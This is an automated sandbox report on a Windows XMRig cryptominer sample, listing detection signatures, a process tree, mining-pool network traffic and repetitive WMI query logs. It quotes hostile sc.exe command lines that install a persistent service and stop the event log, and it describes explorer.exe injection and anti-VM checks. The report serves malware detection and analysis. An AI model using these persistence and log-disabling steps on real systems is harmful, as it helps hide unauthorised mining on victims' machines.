Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LfHJdrALlh.exe

Overview

General Information

Sample name:LfHJdrALlh.exe
renamed because original name is a hash value
Original sample name:0e540d9532a8ea783d15290e948d2e0b744c5c61dc7d1953fcfef1aeda4be999.exe
Analysis ID:1570391
MD5:17e83a7ef86ed642e8182c051cd382fa
SHA1:d5d3e3d6a8b9566b58275ce9c200e9b74f2310ec
SHA256:0e540d9532a8ea783d15290e948d2e0b744c5c61dc7d1953fcfef1aeda4be999
Tags:exeuser-Chainskilabs
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop EventLog
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
DNS related to crypt mining pools
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • LfHJdrALlh.exe (PID: 6024 cmdline: "C:\Users\user\Desktop\LfHJdrALlh.exe" MD5: 17E83A7EF86ED642E8182C051CD382FA)
    • sc.exe (PID: 1216 cmdline: C:\Windows\system32\sc.exe delete "DQKVOCSM" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2520 cmdline: C:\Windows\system32\sc.exe create "DQKVOCSM" binpath= "C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 180 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7112 cmdline: C:\Windows\system32\sc.exe start "DQKVOCSM" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • ograohtgkfie.exe (PID: 2696 cmdline: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe MD5: 17E83A7EF86ED642E8182C051CD382FA)
    • conhost.exe (PID: 2792 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • explorer.exe (PID: 3136 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000C.00000002.4486146482.00000000005FF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    0000000C.00000002.4486146482.00000000005A8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      0000000C.00000002.4486146482.00000000005E5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        0000000C.00000002.4486146482.0000000000639000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          Process Memory Space: explorer.exe PID: 3136JoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "DQKVOCSM" binpath= "C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "DQKVOCSM" binpath= "C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\LfHJdrALlh.exe", ParentImage: C:\Users\user\Desktop\LfHJdrALlh.exe, ParentProcessId: 6024, ParentProcessName: LfHJdrALlh.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "DQKVOCSM" binpath= "C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe" start= "auto", ProcessId: 2520, ProcessName: sc.exe

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\LfHJdrALlh.exe", ParentImage: C:\Users\user\Desktop\LfHJdrALlh.exe, ParentProcessId: 6024, ParentProcessName: LfHJdrALlh.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 180, ProcessName: sc.exe
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeReversingLabs: Detection: 65%
            Source: LfHJdrALlh.exeReversingLabs: Detection: 65%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Bitcoin Miner

            barindex
            Source: Yara matchFile source: 0000000C.00000002.4486146482.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.4486146482.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.4486146482.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.4486146482.0000000000639000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3136, type: MEMORYSTR
            Source: unknownDNS query: name: xmr-eu1.nanopool.org
            Source: LfHJdrALlh.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: ograohtgkfie.exe, 00000009.00000003.2017988558.0000022902070000.00000004.00000001.00020000.00000000.sdmp, xvkjzlkkmfrj.sys.9.dr

            Networking

            barindex
            Source: C:\Windows\explorer.exeNetwork Connect: 51.15.58.224 10343Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.5:49704 -> 51.15.58.224:10343
            Source: Joe Sandbox ViewIP Address: 51.15.58.224 51.15.58.224
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: xmr-eu1.nanopool.org
            Source: explorer.exe, 0000000C.00000002.4486146482.0000000000639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
            Source: explorer.exe, 0000000C.00000002.4486146482.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl0
            Source: explorer.exe, 0000000C.00000002.4486146482.00000000005FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crlQr
            Source: ograohtgkfie.exe, 00000009.00000003.2017988558.0000022902070000.00000004.00000001.00020000.00000000.sdmp, xvkjzlkkmfrj.sys.9.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
            Source: ograohtgkfie.exe, 00000009.00000003.2017988558.0000022902070000.00000004.00000001.00020000.00000000.sdmp, xvkjzlkkmfrj.sys.9.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
            Source: ograohtgkfie.exe, 00000009.00000003.2017988558.0000022902070000.00000004.00000001.00020000.00000000.sdmp, xvkjzlkkmfrj.sys.9.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
            Source: ograohtgkfie.exe, 00000009.00000003.2017988558.0000022902070000.00000004.00000001.00020000.00000000.sdmp, xvkjzlkkmfrj.sys.9.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
            Source: explorer.exe, 0000000C.00000002.4486146482.00000000005FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca
            Source: explorer.exe, 0000000C.00000002.4486146482.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.4486146482.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca0
            Source: explorer.exe, 0000000C.00000002.4486146482.00000000005FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_caY
            Source: C:\Users\user\Desktop\LfHJdrALlh.exeCode function: 0_2_00007FF612D31394 NtWaitForWorkViaWorkerFactory,0_2_00007FF612D31394
            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeCode function: 9_2_00007FF621A91394 NtClose,9_2_00007FF621A91394
            Source: C:\Windows\System32\conhost.exeCode function: 11_2_0000000140001394 NtApphelpCacheControl,11_2_0000000140001394
            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeFile created: C:\Windows\TEMP\xvkjzlkkmfrj.sysJump to behavior
            Source: C:\Users\user\Desktop\LfHJdrALlh.exeCode function: 0_2_00007FF612D33B300_2_00007FF612D33B30
            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeCode function: 9_2_00007FF621A93B309_2_00007FF621A93B30
            Source: C:\Windows\System32\conhost.exeCode function: 11_2_000000014000315011_2_0000000140003150
            Source: C:\Windows\System32\conhost.exeCode function: 11_2_00000001400026E011_2_00000001400026E0
            Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\xvkjzlkkmfrj.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
            Source: C:\Users\user\Desktop\LfHJdrALlh.exeCode function: String function: 00007FF612D31394 appears 32 times
            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeCode function: String function: 00007FF621A91394 appears 32 times
            Source: xvkjzlkkmfrj.sys.9.drBinary string: \Device\WinRing0_1_2_0
            Source: classification engineClassification label: mal100.evad.mine.winEXE@18/2@1/1
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4144:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5780:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5540:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1864:120:WilError_03
            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeFile created: C:\Windows\TEMP\xvkjzlkkmfrj.sysJump to behavior
            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeProcess created: C:\Windows\explorer.exe
            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeProcess created: C:\Windows\explorer.exeJump to behavior
            Source: LfHJdrALlh.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
